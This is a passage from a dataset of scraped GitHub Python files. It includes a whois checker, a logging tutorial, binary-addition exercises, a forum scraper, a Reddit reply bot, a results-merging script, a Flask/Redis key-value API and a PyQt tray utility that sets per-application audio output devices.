== 'socket':\n            response_lines = Whois.whois_tcp_query(\n                query=domain_name, server=whois_server_parts[1]\n            )\n\n        if protocol in ['http', 'https']:\n            response_lines = Whois.whois_http_query(\n                query=domain_name, server=whois_server\n            )\n\n        if not available_search_str:\n            return len(response_lines) == 0\n        else:\n            for response_line in response_lines:\n                if available_search_str in response_line:\n                    return True\n\n        return False\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/plugins/domains/whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5238294816","text":"# LOGGING IS A GREAT WAY TO SEE WHAT'S HAPPENING IN YOUR CODE\n\nimport logging\nlogging.basicConfig(level = logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# to have a file with the messages from the log\n# logging.basicConfig(filename='myProgramLog.txt',level = logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\n# To disable the messages\nlogging.disable(logging.CRITICAL)\n\n# To create and see messages and control your CODE\nlogging.debug('Start of program')\n\n# Example with factorial\ndef factorial(n):\n    logging.debug(f'Start of factorial {n}')\n\n    total = 1\n    for i in range(1, n + 1):\n        total *= i\n        logging.debug(f'i is {i}, total is {total}')\n\n    logging.debug(f'return value is {total}')\n    return total\n\nprint(factorial(5))\n\nlogging.debug('End of program')\n","repo_name":"bruno-gs/Python","sub_path":"Automate the boring stuff/Debugging/LOGGING/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5377817046","text":"class AddBinary:\n    def addBinary4(self, a, b):\n        \"\"\"\n        :type a: str\n        :type b: str\n        :rtype: str\n        \"\"\"\n        return bin(int(a, 2) + int(b, 2))[2:]\n\n    def addBinary(self, a: str, b: str) -> str:\n        result = ''\n        idx_a, idx_b = len(a) - 1, len(b) - 1\n        carry = 0\n        while idx_a >= 0 or idx_b >= 0:\n            v_a = 1 if idx_a >= 0 and a[idx_a] == '1' else 0\n            v_b = 1 if idx_b >= 0 and b[idx_b] == '1' else 0\n            carry, rem = divmod(carry + v_a + v_b, 2)\n            result = str(rem) + result\n            idx_a -= 1\n            idx_b -= 1\n        if carry == 1:\n            result = '1' + result\n        return result\n\n    def addBinary3(self, a: 'str', b: 'str') -> 'str':\n        Len=max(len(a),len(b))\n        a=a.zfill(Len)\n        b=b.zfill(Len)\n        add=0\n        s=\"\"\n        for i in range(Len-1, -1, -1):\n            
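Two quick self-contained checks for the carry arithmetic these solutions rely on (expected values worked out by hand):

# divmod splits a digit sum into (carry, digit): 1 + 1 + 1 in base 2 gives carry 1, digit 1
assert divmod(1 + 1 + 1, 2) == (1, 1)
# the bin/int one-liner used by addBinary4: parse, add, strip the '0b' prefix
assert bin(int('1010', 2) + int('1011', 2))[2:] == '10101'  # 10 + 11 = 21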
temp=int(a[i])+int(b[i])+add\n            if temp>=2:\n                s=str(temp-2)+s\n                add=1\n            else:\n                s=str(temp)+s\n                add=0\n        if add==1:\n            return \"1\"+s\n        return s\n\n    def addBinary2(self, a: 'str', b: 'str') -> 'str':\n        table = {\n            (False, False, False): (False, '0'), # carry and value\n            (False, False, True): (False, '1'),\n            (False, True, False): (False, '1'),\n            (False, True, True): (True, '0'),\n            (True, False, False): (False, '1'),\n            (True, False, True): (True, '0'),\n            (True, True, False): (True, '0'),\n            (True, True, True): (True, '1'),\n            (False, False): (False, '0'),\n            (False, True): (False, '1'),\n            (True, False): (False, '1'),\n            (True, True): (True, '0')\n        }\n        idx_a, idx_b = len(a)-1, len(b)-1\n        carry, result = False, ''\n        while idx_a >= 0 and idx_b >= 0:\n            carry, c = table[(carry, a[idx_a]=='1', b[idx_b]=='1')]\n            result = c + result\n            idx_a -= 1\n            idx_b -= 1\n        (idx, s) = (idx_a, a) if idx_a >= 0 else (idx_b, b)\n        while carry and idx >= 0:\n            carry, c = table[(carry, s[idx]=='1')]\n            result = c + result  # prepend: we walk from the least significant digit\n            idx -= 1\n        if idx >= 0: result = s[:idx+1] + result  # copy the untouched prefix once the carry is gone\n        if carry: result = '1' + result\n        return result\n","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/arrays_strings/add_binary.py","file_name":"add_binary.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23564648797","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport math\nimport csv\n\ncevaplar= []\ntarihler = []\n\n# \"page count finder\": derives the page count from the reply-counter text\ndef sayfasayisibulucu(a):\n    a = a.replace(\"Cevap\",\"\")\n    a = a.replace(\".\",\"\")\n    sayfa_sayisi = math.ceil(float(a)/20)\n    return sayfa_sayisi+1\n\nf = open(\"linkler.txt\", \"r\", encoding='utf-8-sig')\nicerik = list(f)\nfor ic in icerik:\n    try:\n        linkler = 'https://forum.donanimhaber.com' + ic.strip()\n        URL = linkler\n        page = requests.get(URL)\n        soup = BeautifulSoup(page.content,features='html.parser')\n        tumicerik = soup.find(class_ = 'dhfull')\n        cevap_sayisi = soup.find(class_ = 'sayisal-text').text\n        sayfa_sayisi = sayfasayisibulucu(cevap_sayisi)\n        print(sayfa_sayisi)\n        icerikler = tumicerik.find_all('div', class_ ='kl-icerik-satir')\n\n        for i in range(1,sayfa_sayisi, 1):\n\n            i = str(i)\n            print('On page ' + i)
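Assuming the reply counter on the page reads like "1.234 Cevap" (dot as thousands separator), the page-count helper above works out as follows; the +1 compensates for the exclusive upper bound of the range(1, n) loop:

import math

a = "1.234 Cevap".replace("Cevap", "").replace(".", "")
print(math.ceil(float(a) / 20) + 1)  # 63, so range(1, 63) visits pages 1..62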
\n            URL = linkler + '-' + i\n            print(URL)\n            page = requests.get(URL)\n            soup = BeautifulSoup(page.content,features='html.parser')\n            tumicerik = soup.find(class_ = 'dhfull')\n            icerikler = tumicerik.find_all('div', class_ ='kl-icerik-satir')\n\n            try:\n                for icerik in icerikler:\n                    mesaj = icerik.find('span', class_ ='msg')\n                    m = mesaj.find('td')\n                    cevaplar.append(m.text.strip())\n                    tarih = icerik.find('span', class_ ='ki-cevaptarihi')\n                    t = tarih.find('a')\n                    tarihler.append(t.text.strip())\n            except:\n                print(\"Problem on this page!\")\n                continue\n    except:\n        print(\"Problem with the whole thread!\")\n        continue\n\n\ndf = pd.DataFrame({'Cevaplar':cevaplar, 'Tarihler': tarihler})\ndf.to_csv('corpus.csv', index = False, encoding='utf-8-sig', sep = 'æ')\n\n","repo_name":"oguzhari/DonanimHaberForumScrapper","sub_path":"forum_icerigi.py","file_name":"forum_icerigi.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26949440829","text":"import praw\nimport re\nfrom bot import Bot\n\n###########################################################################################################\n\"\"\"\nThis file was written and distributed by Vishay Singh, with huge thanks to the fantastic work done \nhere: http://pythonforengineers.com/build-a-reddit-bot-part-1/\n\nPlease consider visiting the website for further information about the project. \n\nThe bot here runs on the subreddit r/pythonforengineers. Please note that running this bot on any other\nsubreddit can result in your account being banned for breaking the rules (notably spam). However, if you\nwant to run the bot on any other subreddit, change line 29 with the desired subreddit.\n\"\"\"\n###########################################################################################################\n\n\n#a dictionary of mood-quote pairings\nbot_quotes = \\\n{\n\"calm\" : [\" That's what I thought. \", \" Ok cool.\", \" nice ;)\"],\n\"mad\" : [\" No u \", \" Blimey mate, don't have feelings of anger towards me because I'm a more dazzling fellow.\"],\n\"ironic\" : [\" The reddit hivemind continues... 
\", \" Have you ever heard the tragedy of Darth Plagueis the Wise?\"],\n}\n\n#setup reddit\nreddit = praw.Reddit('bot1')\nsubreddit = reddit.subreddit(\"pythonforengineers\")\n\n#instantiate Bot\nmy_bot = Bot(\"Sir Bottington The Third\", bot_quotes)\nfound_comment = False\n\n#loop through the top five posts in the subreddit's hot section\nfor submission in subreddit.hot(limit=5):\n if not submission.archived:\n for comment in submission.comments:\n print(comment.body)\n if re.search(\".*(IMO)+.*\", comment.body, re.IGNORECASE):\n my_bot.change_mood(\"calm\")\n found_comment = True\n elif re.search(\".*((left)+(right)*)|((left)*(right)+)+.*\", comment.body, re.IGNORECASE):\n my_bot.change_mood(\"ironic\")\n found_comment = True\n elif re.search(\".*((you)+((stupid)*(idiot)*(suck)*)+)+.*\", comment.body, re.IGNORECASE):\n my_bot.change_mood(\"mad\")\n found_comment = True\n\n bot_reply = my_bot.get_reply()\n if found_comment:\n comment.reply(bot_reply)\n found_comment = False\n print(bot_reply)\n else:\n print(\"No valid comment found\") \n \n\n\n","repo_name":"V35games/Python-Bots","sub_path":"My-bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9652509496","text":"#!/usr/bin/python3\n\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\n\nPATH = \"/home/baptiste/Bureau/formatTest/\"\nexpName = sys.argv[1]\n\nFOLDERS = [f for f in listdir(PATH) if isfile(join(PATH, f)) != True and expName in f]\nFOLDERS.sort()\n\n\nGstTot = \"\"\nHtTot = \"\"\nHsTot = \"\"\nHobsTot = \"\"\nFisTot = \"\"\nExtTot = \"\"\nfor folder in FOLDERS:\n FILES = [fi for fi in listdir(join(PATH, folder)) if isfile(PATH + folder + \"/\" + fi) and \".res\" in fi]\n for fichier in FILES:\n if \"Gst\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n GstTot += fileFlux.read()\n fileFlux.close()\n if \"Ht\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n HtTot += fileFlux.read()\n fileFlux.close()\n if \"Hs\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n HsTot += fileFlux.read()\n fileFlux.close()\n if \"Hobs\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n HobsTot += fileFlux.read()\n fileFlux.close()\n if \"Fis\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n FisTot += fileFlux.read()\n fileFlux.close()\n if \"Ext\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n ExtTot += fileFlux.read()\n fileFlux.close()\n\n\nif \"NSel\" in fichier:\n fileWriteGst = open(PATH+\"GstTotNSel.csv\", \"w\")\n fileWriteGst.write(GstTot)\n fileWriteGst.close()\n fileWriteHt = open(PATH+\"HtTotNSel.csv\", \"w\")\n fileWriteHt.write(HtTot)\n fileWriteHt.close()\n fileWriteHs = open(PATH+\"HsTotNSel.csv\", \"w\")\n fileWriteHs.write(HsTot)\n fileWriteHs.close()\n fileWriteHobs = open(PATH+\"HobsTotNSel.csv\", \"w\")\n fileWriteHobs.write(HobsTot)\n fileWriteHobs.close()\n fileWriteFis = open(PATH+\"FisTotNSel.csv\", \"w\")\n fileWriteFis.write(FisTot)\n fileWriteFis.close()\n fileWriteExt = open(PATH+\"ExtTotNSel.csv\", \"w\")\n fileWriteExt.write(ExtTot)\n fileWriteExt.close()\nelse:\n fileWriteGst = open(PATH+\"GstTotSel.csv\", \"w\")\n fileWriteGst.write(GstTot)\n fileWriteGst.close()\n fileWriteHt = open(PATH+\"HtTotSel.csv\", \"w\")\n fileWriteHt.write(HtTot)\n fileWriteHt.close()\n fileWriteHs = open(PATH+\"HsTotSel.csv\", \"w\")\n 
\n","repo_name":"rougerbaptiste/CropOutAnalysis","sub_path":"formatData.py","file_name":"formatData.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9273469661","text":"#https://stackoverflow.com/questions/43557929/conversion-of-string-to-upper-case-without-inbuilt-methods\ndef mayus_conv(palabra):\n    for letter in palabra:\n        s = ord(letter)\n        if 97 <= s <= 122:\n            print(chr(s - 32), end=\"\")\n\n\ndef main():\n    palabra=input(\"Enter a word in lowercase: \")\n    mayus_conv(palabra)\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"badorius/curso-python","sub_path":"Ejercicios/modulo_funciones/mayus.py","file_name":"mayus.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74305917609","text":"import redis\nfrom flask import Flask, request, abort\n\n\napp = Flask(__name__)\nr = redis.Redis(host='0.0.0.0', port=6379)\n\n\n# the route needs a <key> URL parameter to feed the function argument\n@app.route('/<key>', methods=['GET'])\ndef get(key):\n    value = r.get(key)\n    if value is None:\n        abort(404)\n    return value\n\n\n@app.route('/', methods=['POST'])\ndef post():\n    dct = request.get_json()\n    key = list(dct.keys())[0]\n    value = dct.get(key)\n    r.set(key, value)\n    return 'OK'\n\n\n@app.route('/<key>', methods=['PUT'])\ndef put(key):\n    if r.get(key) is None:\n        abort(404)\n    value = request.get_json().get(key)\n    r.set(key, value)\n    return 'OK'\n\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=8080)\n\n","repo_name":"mekhnin/awesome","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16545669418","text":"import sys\nimport os\nimport subprocess\nimport time\nimport json\nimport logging\n# watch for processes\nimport wmi\nimport pythoncom\n# ui & threads\nfrom PyQt5.QtWidgets import (QApplication, QSystemTrayIcon, QMenu)\nfrom PyQt5.QtCore import QThread, QObject, pyqtSignal, QTimer, QEventLoop, QSettings, QCoreApplication, Qt\nfrom PyQt5.QtGui import QIcon\n# show notifications\nfrom plyer import notification\n\n# ------------------------------------------------------------------------------------------\n\n\ndef resource_path(relative_path):\n    \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n    # PyInstaller creates a temp folder and stores the path in _MEIPASS, so if we are in a packaged build we\n    # use the _MEIPASS as the relative base path, otherwise we'll use the working directory\n    base_path = getattr(sys, '_MEIPASS', os.path.dirname(\n        os.path.abspath(__file__)))\n\n    return os.path.join(base_path, 'res', relative_path)\n\n# ------------------------------------------------------------------------------------------\n\n\ndef app_path(relative_path):\n    \"\"\"Get the absolute path to the file relative to the executable\"\"\"\n    if getattr(sys, 'frozen', False):\n        # if we are in a bundled app, we need to use the path of the executable\n        # as this is where files like the config or log should go\n        base_path = 
os.path.dirname(sys.executable)\n else:\n # if we are just executing the script as dev we need to use the path of the file\n # as this is where files like the config or log should go\n base_path = os.path.dirname(os.path.abspath(__file__))\n\n return os.path.join(base_path, relative_path)\n\n# ------------------------------------------------------------------------------------------\n\n\n# name of the application\nAPP_NAME = 'EnforceAudioDevice'\n# files\nCONFIG_FILE_PATH = app_path('EnforceAudioDevice.json')\nLOG_FILE_PATH = app_path('EnforceAudioDevice.log')\nVALID_DEVICES_FILE_PATH = app_path('ValidDevices.json')\n# resources\nTRAY_ICON_FILE_PATH = resource_path('EnforceAudioDevice.ico')\nALERT_ICON_FILE_PATH = resource_path('EnforceAudioDeviceAlert.ico')\nCONTEXT_MENU_BG_FILE_PATH = resource_path('ContextMenu.png')\nCONTEXT_MENU_UNCHECKED_FILE_PATH = resource_path('Unchecked.png')\nCONTEXT_MENU_UNCHECKED_SELECTED_FILE_PATH = resource_path('UncheckedSelected.png')\nCONTEXT_MENU_CHECKED_FILE_PATH = resource_path('Checked.png')\nCONTEXT_MENU_CHECKED_SELECTED_FILE_PATH = resource_path('CheckedSelected.png')\nCONTEXT_MENU_ARROW = resource_path('Arrow.png')\nCONTEXT_MENU_ARROW_SELECTED = resource_path('ArrowSelected.png')\n# strings\nTRAY_TOOLTIP = 'EnforceAudioDevice'\n# registry key\nREG_RUN_PATH = \"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"\n\n# ------------------------------------------------------------------------------------------\n\n# setup logging\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(LOG_FILE_PATH, \"w\"),\n logging.StreamHandler(sys.stdout)\n ]\n)\n\n############################################################################################\n# ProcesWatcher\n############################################################################################\n\n\nclass ProcessWatcher(QThread):\n \"\"\"watches for wmi process creation or deletion events and signals when an event arrives\"\"\"\n watcher_signal = pyqtSignal(str, int)\n\n # ------------------------------------------------------------------------------------------\n\n def __init__(self, Type: str):\n QThread.__init__(self)\n self.Type = Type\n\n # ------------------------------------------------------------------------------------------\n\n def run(self):\n self.continue_run = True\n\n pythoncom.CoInitialize()\n c = wmi.WMI()\n if self.Type == \"creation\" or self.Type == \"deletion\":\n try:\n watcher = c.Win32_Process.watch_for(self.Type)\n while self.continue_run:\n event = watcher()\n self.watcher_signal.emit(event.Caption, event.ProcessID)\n except Exception as e:\n print(e)\n else:\n logging.error(\n f\"Tried to create process listener with invalid type '{self.Type}'. 
Valid types are: creation, deletion\")\n\n # ------------------------------------------------------------------------------------------\n\n def stop(self):\n self.continue_run = False\n # disconnect all slots from the signal as it might take a little bit until this thread actually terminates\n try:\n self.watcher_signal.disconnect()\n except Exception as e:\n logging.error(e)\n\n############################################################################################\n# ProcesWorker\n############################################################################################\n\n\nclass ProcessWorker(QThread):\n # dictionary of processes to check, will be filled from json on init\n process_dict = {}\n # the parent app containing config data\n app = None\n # timers that delay the set audio device command (delay is user defined in config)\n delayedCommandTimers = []\n\n # ------------------------------------------------------------------------------------------\n\n def __init__(self, parent=None, app=None):\n QObject.__init__(self, parent=parent)\n self.app = app\n\n # ------------------------------------------------------------------------------------------\n\n def run(self):\n self.loop = QEventLoop()\n self.loop.exec_()\n\n # ------------------------------------------------------------------------------------------\n\n def stop(self):\n # stop all running timers if the application should quit\n for t in self.delayedCommandTimers:\n t.stop()\n # stop the loop to quit this thread\n self.loop.quit()\n\n # ------------------------------------------------------------------------------------------\n\n def add_app(self, application, data):\n \"\"\"add to or update an app in the process list\"\"\"\n if not bool(data):\n logging.warning(\n f'Application \\'{application}\\' is missing parameters. Apps require a \\'Device\\' parameter defining the audio output device.')\n return\n\n app_name = application.lower()\n if not app_name.endswith('.exe'):\n app_name += '.exe'\n\n device = ''\n if 'Device' in data:\n device = data['Device']\n # check if the device is valid\n if not device in self.app.valid_devices:\n logging.warning(\n f'Application \\'{application}\\' has no or invalid \\'Device\\' configured \\'{device}\\'. 
Allowed devices are: {self.app.valid_devices}')\n return\n\n delay = 1\n if 'Delay' in data:\n try:\n delay = max(min(float(data['Delay']), 60.0), 0.0)\n except ValueError:\n logging.warning(f'Delay of \\'{application}\\' is not a number!')\n\n already_contains_app = app_name in self.process_dict\n\n if already_contains_app:\n if self.process_dict[app_name]['AudioDevice'] == device:\n # nothing changed, just return\n return\n\n # either the app hasn't been added yet or the device changed\n self.process_dict[app_name] = {'State': False,\n 'AudioDevice': device, 'Delay': delay}\n\n logging.info(\n ('Updated' if already_contains_app else 'Added') + ' app: ' + application)\n # check if the process is already running and handle it\n self.check_process(app_name)\n return\n\n # -------------------------------------------------------------------------------------------\n\n def check_process(self, process_name):\n pythoncom.CoInitialize()\n c = wmi.WMI()\n\n for process in c.Win32_Process(name=process_name):\n self.process_started(process_name, process.ProcessID)\n\n # ------------------------------------------------------------------------------------------\n\n def process_started(self, name: str, id: int):\n process_name = name.lower()\n if process_name in self.process_dict:\n # already running, ignore this process\n if self.process_dict[process_name]['State']:\n return\n # add the process with its process id\n else:\n logging.info(f\"Found new process running: '{process_name}'\")\n self.process_dict[process_name]['State'] = True\n self.process_dict[process_name]['ID'] = id\n delay = self.process_dict[process_name]['Delay']\n self.set_audio_device(process_name, delay)\n\n # ------------------------------------------------------------------------------------------\n\n def process_ended(self, name: str, id: int):\n process_name = name.lower()\n if process_name in self.process_dict:\n # this process is running and has the same id\n if self.process_dict[process_name]['State'] and self.process_dict[process_name]['ID'] == id:\n self.process_dict[process_name]['State'] = False\n self.process_dict[process_name]['ID'] = 0\n logging.info(f\"Process '{process_name}' has ended\")\n\n # ------------------------------------------------------------------------------------------\n\n def set_audio_device(self, application: str, delay: float):\n \"\"\"sets the audio device for the application after the defined delay\"\"\"\n if application in self.process_dict:\n audio_device = self.process_dict[application]['AudioDevice']\n command = f'{self.app.sound_volume_view_path} /SetAppDefault \"{audio_device}\" 0 \"{application}\"'\n # queue the command via timer\n self.set_command_timer(lambda: self.run_command(\n command, application, audio_device), int(delay * 1000))\n\n # ------------------------------------------------------------------------------------------\n\n def run_command(self, command, application_name, audio_device):\n #res = os.system(command)\n res = subprocess.call(command, shell=False)\n if res == 0:\n logging.info(\n f'Set audio device of application \\'{application_name}\\' to \\'{audio_device}\\'')\n else:\n logging.warning(\n f'SoundVolumeView failed to set audio device \\'{audio_device}\\' for application \\'{application_name}\\'. 
Error code: {res}')\n\n # ------------------------------------------------------------------------------------------\n\n def set_command_timer(self, event, delay_msec: int):\n timer = QTimer()\n self.delayedCommandTimers.append(timer)\n timer.setSingleShot(True)\n timer.timeout.connect(event)\n timer.timeout.connect(lambda: self.delayedCommandTimers.remove(timer))\n timer.start(delay_msec)\n\n # ------------------------------------------------------------------------------------------\n\n def stop_all_command_timers(self):\n for t in self.delayedCommandTimers:\n t.stop()\n self.delayedCommandTimers.clear()\n\n # ------------------------------------------------------------------------------------------\n\n def reset_process_states(self):\n # cancel all pending timers\n self.stop_all_command_timers()\n\n pythoncom.CoInitialize()\n c = wmi.WMI()\n\n # reset current state of all processes and set the device for any active ones again\n for p in self.process_dict:\n self.process_dict[p]['State'] = False\n for process in c.Win32_Process(name=p):\n self.process_started(p, process.ProcessID)\n break;\n\n############################################################################################\n# EnforceAudioDeviceApp\n############################################################################################\n\nclass EnforceAudioDeviceApp(QApplication):\n stop_signal = pyqtSignal()\n\n # a set of valid audio output devices\n valid_devices = set()\n # path to the sound volume view tool to actually run the audio device command\n sound_volume_view_path = 'SoundVolumeView.exe'\n # the thread the worker is running in\n thread: ProcessWorker = None\n\n # ------------------------------------------------------------------------------------------\n\n def __init__(self, argv) -> None:\n super().__init__(argv)\n self.create_settings()\n self.load_config_and_start_worker()\n self.trayIcon = EnforceAudioDeviceTrayIcon(self)\n\n # ------------------------------------------------------------------------------------------\n\n def create_settings(self):\n QCoreApplication.setApplicationName(APP_NAME)\n self.settings = QSettings(REG_RUN_PATH, QSettings.NativeFormat)\n\n # ------------------------------------------------------------------------------------------\n\n def load_config_and_start_worker(self):\n self.create_worker_threads()\n if self.load_config_json():\n self.start_worker_thread()\n logging.info(\n 'Successfully loaded config and started process monitoring worker')\n return True\n else:\n logging.warning(\n 'Failed to load config and start process monitoring')\n return False\n\n # ------------------------------------------------------------------------------------------\n\n def create_worker_threads(self):\n self.thread = ProcessWorker(app=self)\n self.stop_signal.connect(self.thread.stop)\n self.thread.finished.connect(self.thread.deleteLater)\n self.thread.start()\n\n self.create_listener = ProcessWatcher(\"creation\")\n self.stop_signal.connect(self.create_listener.stop)\n self.create_listener.finished.connect(self.create_listener.deleteLater)\n self.create_listener.watcher_signal.connect(\n self.thread.process_started)\n self.create_listener.start()\n\n self.delete_listener = ProcessWatcher(\"deletion\")\n self.stop_signal.connect(self.delete_listener.stop)\n self.delete_listener.finished.connect(self.delete_listener.deleteLater)\n self.delete_listener.watcher_signal.connect(self.thread.process_ended)\n self.delete_listener.start()\n\n # 
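The delayedCommandTimers list above is not just bookkeeping: a QTimer with no surviving Python reference can be garbage-collected before it ever fires. A minimal illustration of the pattern (assumes a running Qt event loop; the names here are made up):

from PyQt5.QtCore import QTimer

_pending = []  # keep references so the timers survive until they fire

def run_later(callback, delay_ms):
    t = QTimer()
    t.setSingleShot(True)
    t.timeout.connect(callback)
    t.timeout.connect(lambda: _pending.remove(t))  # drop the reference once fired
    _pending.append(t)
    t.start(delay_ms)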
------------------------------------------------------------------------------------------\n\n def start_worker_thread(self):\n if not self.thread is None:\n self.thread.start()\n\n # ------------------------------------------------------------------------------------------\n\n def start_reload_config(self):\n logging.info('Reloading config file...')\n self.stop_signal.emit()\n self.thread.destroyed.connect(self.finish_reload_config)\n\n # ------------------------------------------------------------------------------------------\n\n def finish_reload_config(self):\n self.load_config_and_start_worker()\n\n # ------------------------------------------------------------------------------------------\n\n def reset_processes(self):\n self.thread.reset_process_states()\n\n # ------------------------------------------------------------------------------------------\n\n def start_quit(self):\n logging.info('Exiting...')\n # end running watcher threads\n self.stop_signal.emit()\n self.thread.destroyed.connect(self.finish_quit)\n\n # ------------------------------------------------------------------------------------------\n\n def finish_quit(self):\n logging.info('Exit')\n self.quit()\n\n # ------------------------------------------------------------------------------------------\n\n def load_config_json(self):\n \"\"\"loads the apps from the apps json file\"\"\"\n # check if the config exists, if not, create one filled with example data\n if os.path.exists(CONFIG_FILE_PATH):\n config = {}\n # load the config file data\n with open(CONFIG_FILE_PATH, \"r\", encoding='UTF-8') as file:\n try:\n config = json.load(file)\n except json.JSONDecodeError:\n logging.error(\n f'Failed to load \\'{CONFIG_FILE_PATH}\\', aborting!')\n finally:\n file.close()\n # load audio valid audio devices, the SoundVolumeView path and apps. Exit if any of these fail.\n if not bool(config) or not self.load_config_data(config) or not self.load_valid_audio_devices() or not self.get_apps_from_config(config):\n return False\n else:\n default_config = {'Config': {'SoundVolumeViewPath': \"SoundVolumeView.exe\"}, 'Apps': {\n 'MyExampleApp1.exe': \"MyExampleAudioDevice\", 'MyExampleApp2.exe': \"MyExampleAudioDevice\", }}\n data = json.dumps(default_config, indent=2)\n # write a default config file if the config doesn't exist\n with open(CONFIG_FILE_PATH, \"w\", encoding='UTF-8') as outfile:\n outfile.write(data)\n outfile.close()\n logging.info(\n f'Created: \\'{CONFIG_FILE_PATH}\\'. Please add your apps to the file and reload the config.')\n self.send_notify(\"Enforce Audio Device Info\",\n f'Created: \\'{os.path.basename(CONFIG_FILE_PATH)}\\'.\\nPlease add your apps to the file and reload the config.', ALERT_ICON_FILE_PATH)\n return True\n\n # ------------------------------------------------------------------------------------------\n\n def load_config_data(self, config):\n \"\"\"loads general config data from the config file\"\"\"\n\n has_config = 'Config' in config\n if not has_config:\n logging.warning(\n f'Couldn\\'t find \\'Config\\' section in the config file.')\n\n # checks if the sound volume view tool path is valid and points to a file\n path_valid = False\n if has_config and 'SoundVolumeViewPath' in config['Config']:\n self.sound_volume_view_path = config['Config']['SoundVolumeViewPath']\n if os.path.isfile(self.sound_volume_view_path):\n path_valid = True\n\n if not path_valid:\n logging.error(\n f'Invalid Sound Volume View path \\'{self.sound_volume_view_path}\\'. 
Make sure the path is set correctly in the Config.json.')\n self.send_notify(\"Enforce Audio Device Error\",\n f'Invalid Sound Volume View path \\'{self.sound_volume_view_path}\\'.\\nMake sure the path is set correctly in the Config.json.', ALERT_ICON_FILE_PATH)\n return False\n\n return True\n\n # ------------------------------------------------------------------------------------------\n\n def load_valid_audio_devices(self):\n \"\"\"fills a dictionary of valid audio devices that can be used\"\"\"\n # if this file already exists, remove it\n if os.path.isfile(VALID_DEVICES_FILE_PATH):\n os.remove(VALID_DEVICES_FILE_PATH)\n\n # call the soundVolumeView tool and export all audio devices to a json file\n command = f'{self.sound_volume_view_path} /sjson {VALID_DEVICES_FILE_PATH}'\n #res = os.system(command)\n res = subprocess.call(command, shell=False)\n\n if res == 0:\n # try to open the files 10 times, fail if not possible\n for _ in range(10):\n try:\n with open(VALID_DEVICES_FILE_PATH, 'r', encoding='UTF-16') as file:\n data = file.read()\n device_dump = json.loads(data)\n self.load_audio_devices_from_device_json(device_dump)\n file.close()\n os.remove(VALID_DEVICES_FILE_PATH)\n break\n except IOError:\n time.sleep(1)\n else:\n logging.error(\n f'Failed to access default devices in {VALID_DEVICES_FILE_PATH}, SoundVolumeView failed to create the file.')\n return False\n else:\n logging.error(\n f'Finding valid audio devices failed using {command}. Error code = {res}')\n return False\n return True\n\n # ------------------------------------------------------------------------------------------\n\n def load_audio_devices_from_device_json(self, device_dict):\n \"\"\"reads the device dictionary and picks valid output devices\"\"\"\n for device in device_dict:\n if device['Direction'] == 'Render' and device['Type'] == 'Device':\n self.valid_devices.add(device['Name'])\n return\n\n # ------------------------------------------------------------------------------------------\n\n def get_apps_from_config(self, config):\n \"\"\"gets all configured apps from the config\"\"\"\n if 'Apps' in config:\n apps = config['Apps']\n if bool(apps):\n for app in apps:\n self.thread.add_app(app, apps[app])\n return True\n\n logging.warning(\n f'No Apps defined in \\'{CONFIG_FILE_PATH}\\'. 
Please add apps to the config file and reload the config via the system tray.')\n self.send_notify(\"Enforce Audio Device Error\",\n f'No Apps defined in \\'{os.path.basename(CONFIG_FILE_PATH)}\\'.\\nPlease add apps to the config file and reload the config via the system tray.', ALERT_ICON_FILE_PATH)\n return False\n\n # ------------------------------------------------------------------------------------------\n\n def send_notify(self, title: str, message: str, icon, duration: int = 10):\n notification.notify(\n title=title,\n message=message,\n app_icon=icon,\n app_name=APP_NAME,\n timeout=duration\n )\n\n############################################################################################\n# EnforceAudioDeviceTrayIcon\n############################################################################################\n\n\nclass EnforceAudioDeviceTrayIcon(QSystemTrayIcon):\n\n def __init__(self, app: EnforceAudioDeviceApp):\n super(EnforceAudioDeviceTrayIcon, self).__init__(app)\n self.app = app\n self.create_tray_menu()\n self.act_autostart.setChecked(self.app.settings.contains(APP_NAME))\n\n # ------------------------------------------------------------------------------------------\n\n def create_tray_menu(self):\n icon = QIcon(TRAY_ICON_FILE_PATH)\n self.setToolTip(TRAY_TOOLTIP)\n self.setIcon(icon)\n self.setVisible(True)\n\n # Creating the options\n self.menu = QMenu(\"Options\")\n 